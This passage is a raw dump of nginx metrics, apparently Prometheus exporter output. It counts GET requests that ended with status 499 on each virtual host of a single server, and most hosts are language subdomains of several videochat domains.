nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.tv.br"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.world"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bs.videochat.world"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bwfzopl.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ca.videochat.world"} 267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.tv.br"} 277 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ceb.videochat.world"} 226 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.cafe"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.tv.br"} 479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="chm.videochat.world"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ckdbbet.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.tv.br"} 276 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cs.videochat.world"} 241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.cafe"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.tv.br"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cy.videochat.world"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="cytjruk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="czhdzka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.tv.br"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="da.videochat.world"} 336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.cafe"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="de.videochat.world"} 356 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="demo.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="dev.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.cafe"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.tv.br"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ee.videochat.world"} 243 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.tv.br"} 381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="el.videochat.world"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="en.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="en.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="en.videochat.tv.br"} 92 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.cafe"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.tv.br"} 733 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eo.videochat.world"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.show"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.tv.br"} 474 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="es.videochat.world"} 430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.tv.br"} 664 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="et.videochat.world"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="eu.videochat.world"} 291 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.tv.br"} 206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fa.videochat.world"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.date"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fi.videochat.world"} 445 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.tv.br"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="fr.videochat.world"} 367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.cafe"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ga.videochat.world"} 124 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.tv.br"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gl.videochat.world"} 357 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.cafe"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.tv.br"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="gu.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.cafe"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.mx"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.tv.br"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="he.videochat.world"} 81 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.tv.br"} 251 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hi.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.cafe"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.date"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.tv.br"} 212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hr.videochat.world"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.cafe"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ht.videochat.world"} 207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.cafe"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.tv.br"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="hu.videochat.world"} 207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.cafe"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.tv.br"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="id.videochat.world"} 391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ip-api.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.tv.br"} 395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="is.videochat.world"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.cafe"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.tv.br"} 880 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="it.videochat.world"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jaiyuba.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.cafe"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.tv.br"} 962 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jp.videochat.world"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.tv.br"} 259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="jv.videochat.world"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.cafe"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ka.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kbmjvka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kjjlaro.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.tv.br"} 230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kk.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.tv.br"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="km.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="kn.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.cafe"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ko.videochat.world"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.cafe"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.date"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.tv.br"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ky.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lb.videochat.world"} 447 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.cafe"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.tv.br"} 282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lo.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.cafe"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.tv.br"} 216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lt.videochat.world"} 326 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.date"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="lv.videochat.world"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.cafe"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.tv.br"} 316 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mg.videochat.world"} 288 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.tv.br"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mi.videochat.world"} 267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.cafe"} 88 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.tv.br"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mk.videochat.world"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.cafe"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.tv.br"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ml.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.cafe"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.date"} 6 